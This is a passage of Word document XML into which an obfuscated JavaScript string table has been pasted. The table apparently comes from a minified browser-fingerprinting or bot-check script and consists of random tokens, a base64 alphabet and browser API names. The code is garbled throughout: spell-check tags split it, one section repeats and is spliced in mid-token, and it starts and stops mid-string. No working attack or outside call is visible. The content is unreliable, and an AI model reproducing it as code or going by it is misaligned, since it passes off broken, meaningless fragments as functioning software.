araqtH9zI", "Z8R7oAyQpwu-", "bFzjFrYVO9lTC8w", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GmvnTZkAK_dPCNU</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "-tg8s1nt_BKS3FYSLO-mEA_R66KiPp8QyXVOL4c", "aTPjYYc5GJMBU9OKsw", "oyTtD5oxM8B1MY22jG4", "e0buMYEyB_pcRo7y", "TBKaOZ8yW_ltHqfxxBBpkg", "NcwHlnfu-w3_", "nJMEmmPAsC2suCN_DJbTZg", "F2LmQp4UfMAFEIez-gB-yQ", "VPUouyHp6n_evhwyHK_iQA", "File", "global", "1WOfOeBzPOEdWMPIxg", "pXH-J681G8Ib", "yRv5T7MGC9w7bp62", "closed", "f5U4kDGL8UbPugIaXLrMKgM", "xxTnF5ghPs4d", "3MQymkTO4wL731Bqf4_rVzTFwa7sHIgC5nwCIcLLBcBPB9fi-dPRvRjNLPURWXx8-w", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>LuU</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "nbs-9grOoAXlhg", "oWLRV7w1B_5KYviS", "iIJt8ne4oQ", "-SeRL_1qRI8", "dhjdQLYbFao3d_W2mwNX5ec_UDYanCOv", "b4sv_VvoihqN6BlBd5imSByuwO3yYuUQxW0", "4_ca6VGgjw", "m3GWLot5Yw", "u071ZK0_GIRy", "stringify", "r-Q", "_1GtQ85oFQ", "Zz3ODugvDeomc_C3_RpA8K0DMktggmeqZeTjtBBHghnGg05jC0NXAJ8G-yjXtA", "b5Bf5C2z5nOuvms6EfeXJHS1lc-dPrxnm0AoGfWMMeA4fJndj_yvnGqEVJ51Ol9O1YhI8PoE1GUQxXVk1UyghDOfsg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SxePAfwLacANNaE</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Promise", "aGHiZoY5", "X-JLwCmI5Xr0vDg1SNWCP3T_jIiXErwqqVJ0CIzScOxbVLiT9_GZmg_0L-ZBLEow3I9Mn54JxA0sthhE0Rn_-QrWgeshZye9SQMBEKpzFKXUUw", "Xl3xGPMHLb85LbvDkw", "Event", "-0nAK6otDoFHJfnQ2RNU4IY", "9uI", "z8ciuF3n7y75glxHPrvyYjid6_L7c91Jrw", "maIt21jK0GqB1A", "_rVr4xS2jGmq71VzWa_HUSc", "YEKMQ-V_FZ1XQ9HQvg8-7No7WA", "OyjCU9MaJc0xLqP22RdwgrYwMEhM2mD4I4uj2Wtg6EjqqwcGYFk8b6Ir-z-M66z6TyCVJWiIOezhbqmJPg", "R5Vtxh2Ox0bT", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>MowAhXLKqiA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "t8lHsBejmnPb", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>YXTtXg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "g6I", "i_191RyUqk_AlkNsao_pRA-</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>MxabmX8YZqSRYaI_wTNNJEtfg6t3bvU72ZfEZUz8ytaAph4Zi4TtDkn9-", "E3qPBPpZVbl_I-XR3wpS5aUiSxBE2HKmLJCG2G9YvmDQyXJ7MUFaBYZ7tniJy5HhHUSqUVKXF8LqLZWdN9UxKZ0JeCbjoaok0YeC22Gs22JD21Fr3GUj5XMqkYp7SBlFtEoJpRsCbw7RhoUSfuyNCnLg9p7KlvyDs2hVXVoRNEOhp6Jfemm9xUS_kkgRE9fnAE7JVVYSGALdzyEmfQPyuLnc9regY9QOPIUa_a-qYXHTuOm-UhN24VurAMLUfZwGcTlLd83n-4QBzzNm3Db6trclnjmQ3tretl95EajwlD8H35lME4-pCiBT3i35UIu8pss","GFipKNlrFIRvEQ", "ceil", "CSS", "yctLije8gC3H", "B0rqAbwNJ_dDEcvN7B93_rEWBH8e", "2L4ThUzJ5XSYpiU", "ZX2nFcJwMA", "action", "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_=", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SyaMZtVyDfQBdKQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "HlLeH_Q2", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Kesn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>&gt;&gt;     var g = ["</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fromCharCode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "p2OdCdJjYo5AVq3VnWcz579u", "owuuWpM0VbA2Iv7tqnVh1JoEOUgQ8kSXRovK5Dcmuw", "_fI43x6o0WOT2E0ueLziHA", "ckjUauR6W752VQ", "ClyafP4TOrlk", "2Ypz-iaCjG2lmUsAVKLFAlGanuXaeNgfkDE7cMvORQ","zNlb-nqt-mz4uw", "I3uSbfxzJQ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>iudGmg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "{\\s*\\[\\s*native\\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>s+code</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\\s*]\\s*}\\s*$", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fyTldsREXQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CdsUiA-ZxEfxiic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "x7VfgHDUsmit_QUp", "VTCaefR0WQ", "PIUjxkHUqBmWigYCMer4T3SB47k", "NHfjbshWBP9ObrY", "application\x2Fx-www-form-urlencoded", "PZsu5Brjvyi59HBj", "Y2WQUft6DZZYH4TtvSc6", "MHE", "^(?:[\\0-\\t\\x0B\\f\\x0E-\\u2027\\u202A-\\uD7FF\\uE000-\\uFFFF]|[\\uD800-\\uDBFF][\\uDC00-\\uDFFF]|[\\uD800-\\uDBFF](?![\\uDC00-\\uDFFF])|(?:[^\\uD800-\\uDBFF]|^)[\\uDC00-\\uDFFF])$", "SmLeB7IDDb5zfA", "uFWxBehfSKN6Sp3ktl0UzA", "fEiFXd1E", "ORuFDtNFO4k_Yg", "MnC6NcJ7LcsCGc_Osj&gt;&gt;     var g = ["</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fromCharCode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "p2OdCdJjYo5AVq3VnWcz579u", "owuuWpM0VbA2Iv7tqnVh1JoEOUgQ8kSXRovK5Dcmuw", "_fI43x6o0WOT2E0ueLziHA", "ckjUauR6W752VQ", "ClyafP4TOrlk", "2Ypz-iaCjG2lmUsAVKLFAlGanuXaeNgfkDE7cMvORQ", "zNlb-nqt-mz4uw", "I3uSbfxzJQ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>iudGmg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "{\\s*\\[\\s*native\\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>s+code</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\\s*]\\s*}\\s*$", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fyTldsREXQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CdsUiA-ZxEfxiic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "x7VfgHDUsmit_QUp", "VTCaefR0WQ", "PIUjxkHUqBmWigYCMer4T3SB47k", "NHfjbshWBP9ObrY", "application\x2Fx-www-form-urlencoded", "PZsu5Brjvyi59HBj", "Y2WQUft6DZZYH4TtvSc6", "MHE", "^(?:[\\0-\\t\\x0B\\f\\x0E-\\u2027\\u202A-\\uD7FF\\uE000-\\uFFFF]|[\\uD800-\\uDBFF][\\uDC00-\\uDFFF]|[\\uD800-\\uDBFF](?![\\uDC00-\\uDFFF])|(?:[^\\uD800-\\uDBFF]|^)[\\uDC00-\\uDFFF])$", "SmLeB7IDDb5zfA", "uFWxBehfSKN6Sp3ktl0UzA", "fEiFXd1E","ORuFDtNFO4k_Yg", "MnC6NcJ7LcsCGc_OsjsthJpUME4-oFXPB_E", "wC6We9lmWJ4cEpSj8mxy0vE8", "Ib5J1TiEjniowzZ-CIzLXzz7nNuJ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>MDyCecdmWekWbrytiQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "24RBxzOJziCX7A", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>setTimeout</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "aAOzO_0faKlMRA", "vELqZ5suX9FSAQ", "5803ol779AbH8kgXKf6kAEPV6J62N5EX7WRZNY6y", "\uD83C\uDFF4\uDB40\uDC67\uDB40\uDC62\uDB40\uDC65\uDB40\uDC6E\uDB40\uDC67\uDB40\uDC7F", "gw24PM0oOtMJ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>onreadystatechange</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">", "QnegWe5abZtfVg", "name", </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>"JmWMSexUJZwJbaT_1w", "49V6ukuOv1z20kc6E4ekUx7U3rvLdNMK2mRfC9ygXLZwYPa57pfytyXhCo02dw", "oz3IP-9OcA", "DRjjA8xoGA", "yKEJl3rHgDKm9XsyAofWbHO6zo_DRf5u5xM6Ss_VPq1cEvHQ8LnQ0VHzYadGbwhnj8Ap18xAh29z5VoNhVe3sH2ez6JyYGnp", "0MsnwV-MoS_W7zV4QeXXUB2WqZWNNN8", "bg-Vau5CV4w", "l5AJkXjO", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>LGuPQQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "qmu0ceZsNL9VDI-5j0ot", "domain", "d1GNMo9ETsZwPLmPuA9M", "crEN-zrDwWjs_WZNK96PM0Gh2JaQJa5lwg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ReferenceError</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Go0e2HU", "is9ArjOnlDTqp25SRYPdcBa3lI3YYf49hgFkSvzZY7RVZsPZw7D012aHEcQ2JT8DnZIQ56NW_AF46w", "W0OnYpZGYdQQUciNrWtxm6lDEThq5xHWcq-m43o", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>OffscreenCanvas</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "33_S", "a4tisxylnnDt8xg", "iPMOj2HK0ho", "Z5EqgH7f7wE", "parseInt","XHzTRPMYBMVqIe2jnhYX7o9jUFVL2X68KuDWzW9I2miP0yc-OEFMDZFg1jiJyri5VU8", "IkqgUcAXJ6lBbw", "WZ0OlGbexQK2-j82X8yCOV_2gYWdA69s-3UKC_qTAKkaBf35_5GazEisQ_1dG2lphNR_wc4Qh3kj9E96tx3m_SXVr-o6bHDiB386POlIXe3BFYGrFav0EPb-QXI", "5zTEcNYre5V0OA", "jXLxUZQ-bMNuevW5tz1o1qRV", "D74", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bDKbeclZUqkceQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "d9MCsgbfwU_7oQ", "9CuOY_Z8COMEfKeLkQ", "configurable", "JXC5IMVyb7V_", "ExPoTYlqX8wLTZbwrQFeydcqMnIy0lSAArSdyEYxhEWSn04rMTdbN9IhtWyS4rP5GH31RR6jdpHJTpX_ScUNN79hVg", "2zzzSIEfSt8CFNK55mUpldYINHYqlQLjcfXD7joyxU_bhm4ram1eJ9AXojDOoP3sbzjId1Gnf96_Yt_SNqA", "Zo0ttRXq4X8", "rrFu5Ru4tFiewkVkarn6RhGX7_HzfNBTzTAXdt3wC8h-Zoiw0KC75GeaV5kpfiRStece5PZ2oGZI2HQ9tXuchy7zs8cCQEvFMGZjb84EfMzwd7DceMfWBNOFHy3c-r3wToHoRPrjju8wZzKyzVQlpdQBQTpoYx00Mcb48-nr_6JARkO-m4hccuoXN6m9s39I6fln_fP6-bgWLsDHnOITWVg9FxEN_UWgji2vVQEFgI0yGHgQ4LvDSfUE4Sg13TOI1p7503gdMGXgLtKHPdcbV1aSHJc9cGk_Sr7ZkwZdOoz9FHit8m5I68GyYuYYsWpdRyowbVw2rUhVPbZYP3ypmrLmgQoCnrE1ieUsLQE9tVwnNbb6YcBLlprUFvNpHiB_VI9GTerNW9Skm8qJgJsFU98BWkRBDOpxQwE-PK48g4EgBH6-_UV0hXHZ6mz6A0JdaXUC7UrPYPv3lA1E0BG2AT2xYXUAenmRn-zRraJCAbMAPMNgQXHZLwTtzfqlBiIYAv_6wqjtXbcN3KSOHVqrqBAmNj_YUjqNSf7qC1eEjphNbDAuhjizxGJ8LnSGJcbLstOsQtOgzvngma6fL4x_WEzmDAmptzC1e9J7dX7cs96pOHtkrrZp31TGCRycFgoJIALePS6UFhkuun6YnLgVYnqPqgXjqNrgGvFlVeMhYNwpk7pDDaDIK8Yml1ZGE4Az4gBo0J9QTN96_-hX5tBx5BegzQOskZrIRbrqI1tKdv4BLtdH5LmTdKvvoyxrCR0FPsv4-uWDHXRcg1NkgnVOGVoblZhTvXbJBUSc3wFgjzvDNw_K67eBQ-H1H8qwmY2zfa3rdkPD4glhfd1g3wvUxrnFxeBU44UVcVNzY3OvAJBb4aKw5BAh_Tj_JA8xcZ-PtPoctuB7JE6z8QLbjC10Sls0L51lmgIa8PrHg8_xJTnA7nqgPKa_0MJoUq3uN6MHHEaeMvWSS2RzNv0gvPHEJKbXiuRCeSf9uXKnH8hwE136DNk1pmhE0dfxQOd9ERe9vj61FtNXeGUTXuB-Mlb7cUeeFgBrEoAHLOxuiKtrsvUqSDIUZ8ErLDgErFHbc0CnqmpCQyCycFNU2mPpiAY52bf</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>aFDsBaYLy7UR1DRAXI4p5ar-8dBRVHvMDE1N9aS2kRBGHbW69u9ubvERwgVsEYiVFsxDqa3f7UMrv_t3--fHYAIyFy_R5Tz94TERj2nJCpatV1qrfYYk9tu0Wh-hBekQryBSWXGYUvx_DhIHkeVgsvlLoq9jGPC-_RYc1KlGLbQdS65vpIIDbM66I_C08tw-Y91GotdlP_ssSlEl0FujZy94hBKacDPu53LajqoDlgWOhKpzv1bkZe0sNOLMNoEEuB7UzHOOzyKslJNLpxTx3yqy79HDsE7A9WLAOovLAMON_L4FKnOFX2l_9N2ajn-D64TQylqlcrbG6mTg_UCrdHx_nKAsVm3Qzy8YjnOMQGRCixVlMtMhvXOVHtu-fvMGLX41NC4S09DeB5oCh_urcx9KR8KSRIFhaCTtJn-oTQlutcxKH5Ao32Tzha1XX1wPE5eiQ6-LrVZgEQiUcUKHZJ4dgfyrBHYCsorIb_PX6QsrW3R9vK0PmkRZtuoz__xsa5z-Zc1sVFdm3S_iJq7DWx66VnoqhDMfqK4rhzVe7r9pmbF9Jugj2ya_YP-v7_0r-9cSLbJRE28BBDvqZ5rnJpeGjz-WqDQ__nmeAYjcZcN40WxI6hU81mbBpXA6RvFEqgIR1i0l_Hmewkx3ABrE9lJ95U5__rthBQcS5fsIDTecK9oixzyHTHeQ-lN-c3CpwZLtH16r_0hbootQX038z4OU1QipYoxHDJ9Iqzis0pnoadVoME9ap6U0aeFSCw1gkIFcqkTcyuPbDCKaqx7Yr1Bahgi87BuofsBHg6SPb57i23_vNf7z77SDuVyCRKo5lbgOoY_R2eaI3WiUYhAobVjNTwcp2_pBf2bY74Kg-HSNRG46uGR4iby_J10QDg1tOWQtTvhcPjCLmr3Ucb-437Z9-tQ8BTnm4HYuQojk_i1mvsmahuTJCK6cbZKjxOitmuuG3auaKpE2PbAFaQbymWEj0TH4vEuqyNYuy5yb5oMdG5l-FztQEVI7sWKsZILXJu7uXLsvUO18DiJhBoMvdLNXQKlMfizJb_QG2EEspMpEIVy8GShymsVORDmq33NOokDIqwYxsXg6aZtknsFWvTOv0paZ-BD70j17KFIiTp552_Raos7BFHcgsY_v4D46sA8CtZo0_lglJWMlDrRZkVPlfmcorkhRHSZmewXQMdwIhO7B2nmvcHmAEUQz8YDXDJ3ZpUuj9oEtMb_BNCUc94Z4RAdCAMT7QUIGisS0CB_dInj9clJkJeaB8WvXaEBfPT-7pi8XP6rUXA5AxUMmrGG7TBWrV5UlqG5eEgEv3lfo3uAlFQ7HI8dNS2xr4nN_LsPJZmv0JlLPqXdV3fhzk7GaCO0kzfUbno3beo8DwOEhCblIhquyaRVWwwGupay_LvafHcDpgWOqJsFxHPFYYVbxtI9z8q78yfovXzi7IH_RV5WozfdDpF6J3JknwXJuZSmv7IAfq6vPulZt7gJAWwoBeW_U9AKYlDyuOijtNsxAXoCRjx8PK_DNvEQQggDFmY3Fsw6OpiJ7-stG0bf17enkIZPt3G2Kzxnv9NqRvLmJtxkFXhAdI5Oht2s24SQmCVYnezypJ0LJSEZ91FII6ibw3vznavP8xuR4q8nnoop-RURn6FqExbAGJFQxtNGkgEiLzqrmJii-URl-H6JuwKwBeABH4VQCEmQQRbDVsN738CYIJXZhpsV5EigmxpUYOu1RRMJBq3BMsCFbzV69FyLrgBxuR0ycO-lsA4rEr1GVkZLV7DpkCPdpP24LjI29fgcW4QpgPteAkAOEHrLtiA5Bj4c8dAH6177a30aUjHi1zWaNy15TxzMx9uXcXy7UAwnhdLohkVdOP1y8IcPnjNKCF4ulSoo6VSUipIUf8iVcOI_NmlZD_-46MjjkNEriKkzG1jRfr8Clh_86YgZ7kOSgZEvqmbTfokTwRAmHY4thzc-BbIyK4qnHLxUpNDTgJ-HLIyRZlODonWi2ncL4DwB04rn-KFonKicToH-Zl_1_DwaMl6-YXHZ0Uqzxk-Q15co-N4VpOTK0IuAyMKmDVha7Y71V9vTf0x-ILfqCEO36xFdLaNJ_FA7QluR3NLcKuvbwP0ljy-</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>fc4YpJCjEKFlRbyguXR1YyGbUnLCOHjxHMwKUK8Bf0J774lvJ5JiDn8l-XHePo9YRaraqtH9zI", "Z8R7oAyQpwu-", "bFzjFrYVO9lTC8w", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GmvnTZkAK_dPCNU</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "-tg8s1nt_BKS3FYSLO-mEA_R66KiPp8QyXVOL4c", "aTPjYYc5GJMBU9OKsw", "oyTtD5oxM8B1MY22jG4", "e0buMYEyB_pcRo7y", "TBKaOZ8yW_ltHqfxxBBpkg", "NcwHlnfu-w3_", "nJMEmmPAsC2suCN_DJbTZg", "F2LmQp4UfMAFEIez-gB-yQ", "VPUouyHp6n_evhwyHK_iQA", "File", "global", "1WOfOeBzPOEdWMPIxg", "pXH-J681G8Ib", "yRv5T7MGC9w7bp62", "closed", "f5U4kDGL8UbPugIaXLrMKgM", "xxTnF5ghPs4d", "3MQymkTO4wL731Bqf4_rVzTFwa7sHIgC5nwCIcLLBcBPB9fi-dPRvRjNLPURWXx8-w", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>LuU</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "nbs-9grOoAXlhg", "oWLRV7w1B_5KYviS", "iIJt8ne4oQ", "-SeRL_1qRI8", "dhjdQLYbFao3d_W2mwNX5ec_UDYanCOv", "b4sv_VvoihqN6BlBd5imSByuwO3yYuUQxW0", "4_ca6VGgjw", "m3GWLot5Yw", "u071ZK0_GIRy", "stringify", "r-Q", "_1GtQ85oFQ", "Zz3ODugvDeomc_C3_RpA8K0DMktggmeqZeTjtBBHghnGg05jC0NXAJ8G-yjXtA", "b5Bf5C2z5nOuvms6EfeXJHS1lc-dPrxnm0AoGfWMMeA4fJndj_yvnGqEVJ51Ol9O1YhI8PoE1GUQxXVk1UyghDOfsg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SxePAfwLacANNaE</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Promise", "aGHiZoY5", "X-JLwCmI5Xr0vDg1SNWCP3T_jIiXErwqqVJ0CIzScOxbVLiT9_GZmg_0L-ZBLEow3I9Mn54JxA0sthhE0Rn_-QrWgeshZye9SQMBEKpzFKXUUw", "Xl3xGPMHLb85LbvDkw", "Event", "-0nAK6otDoFHJfnQ2RNU4IY", "9uI", "z8ciuF3n7y75glxHPrvyYjid6_L7c91Jrw", "maIt21jK0GqB1A", "_rVr4xS2jGmq71VzWa_HUSc", "YEKMQ-V_FZ1XQ9HQvg8-7No7WA", "OyjCU9MaJc0xLqP22RdwgrYwMEhM2mD4I4uj2Wtg6EjqqwcGYFk8b6Ir-z-M66z6TyCVJWiIOezhbqmJPg", "R5Vtxh2Ox0bT", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>MowAhXLKqiA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "t8lHsBejmnPb", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>YXTtXg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "g6I", "i_191RyUqk_AlkNsao_pRA-MxabmX8YZqSRYaI_wTNNJEtfg6t3bvU72ZfEZUz8ytaAph4Zi4TtDkn9-", "E3qPBPpZVbl_I-XR3wpS5aUiSxBE2HKmLJCG2G9YvmDQyXJ7MUFaBYZ7tniJy5HhHUSqUVKXF8LqLZWdN9UxKZ0JeCbjoaok0YeC22Gs22JD21Fr3GUj5XMqkYp7SBlFtEoJpRsCbw7RhoUSfuyNCnLg9p7KlvyDs2hVXVoRNEOhp6Jfemm9xUS_kkgRE9fnAE7JVVYSGALdzyEmfQPyuLnc9regY9QOPIUa_a-qYXHTuOm-UhN24VurAMLUfZwGcTlLd83n-4QBzzNm3Db6trclnjmQ3tretl95EajwlD8H35lME4-pCiBT3i35UIu8pss", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GFipKNlrFIRvEQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "ceil", "CSS", "yctLije8gC3H", "B0rqAbwNJ_dDEcvN7B93_rEWBH8e", "2L4ThUzJ5XSYpiU", "ZX2nFcJwMA", "action", "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_=", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SyaMZtVyDfQBdKQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "HlLeH_Q2", "Kesnoz3g8k3FpQQ9", "6_c","pd4LuWvKhxTEpgc", "7iTRE6xxBddfOOOu", "sPVR6SOgknGhgA", "7fg", "fjzya_01MJkRa9X_", "Int32Array", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SBDtRKMSRNNSeOzDxg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hasOwnProperty</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "mL8sh03E4062lCwuK4rfFn3IquGvG4I", "1S65F9FBaQ", "vD_2KJkhD8sLZpe-", "cn7sYIQkQsdUE5iavg", "[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xX</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>][</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nN</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">]--", "jyPZSaocE_E-UuH_yiNHybI0d0dBz1H6Kpb7kDg4qiM", "KzafEuBXFq4nb-2vhRVR9u8n", "q-QFx0TO", </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>"9PJTujPk", "TiyaKZ0qb-JlGa674g", "EDW9TpxKAeNaAA", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>setAttribute</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "443", "get", "lbECiFqZ3QXQwWIoCte6PTik", "F8Iewk7TszvT60QgEvXPLH0", "Z9kj5kTq7xbfiRpXeLajSxOUrPfXLPhzsGArHMS8eb5ZNL3Q0Nvmuno", "GEKcTPV2Ho9uaQ", "7QjtEqwGNPo", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>toLowerCase</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "from-page-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>runscript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "1zC6WOVFM7EXQ5ee", "qTbXbbYySOlDSOfRvA9wheY5UgoyzR7U", "YsECpHeT6g", "r4A06ln17zW-gh9L", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ifsoiEQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "oiD5csQFBKo", "WjKUUeRILKY3daLp0CIO4qEOZkpvxEe8Ytes-1Vl71iezicXV3wYHI4upiCN58XFHhS1NB2Ub-u8eraLDtVmdw", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GTzSeKY</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>frameElement</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "HWvxH6k4EOVVSw", "KzO6RvxXZakpNb2_qXx4xP1ceA", "CIJ1mwLd11SxlWsOKQ", "Document", "5sNu5gKywHLo6mYxd9SOOGXv77fTL6wl8A", "CIJPyT6_ow", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>forEach</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "FCS7RfF2c_kf", "ydBfsSq1g2ropXoiUsSAMFGijceIIuQ4mwcKR43MIelCWcGUwduUinyXAP4oXw0srpEyj_JcnUE", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PsQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "vvoNn3Lg1w", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>createEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "8Tu-fo9KCZ0JTsqzijB925AvNjxIu0yBStPJiGE2", "URL", "EZI04A7a", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sIhhvwbV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Error", "sFKNAMlIXLlDMLa4mQ", "HKgD1Q793GGJtmISLKmFKwjl98w", "Mt1NqAylvXU", "assign", "S5UH62HIwQ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>JcoYhgqgzHjzmzM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Hel$&amp;?6%){</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
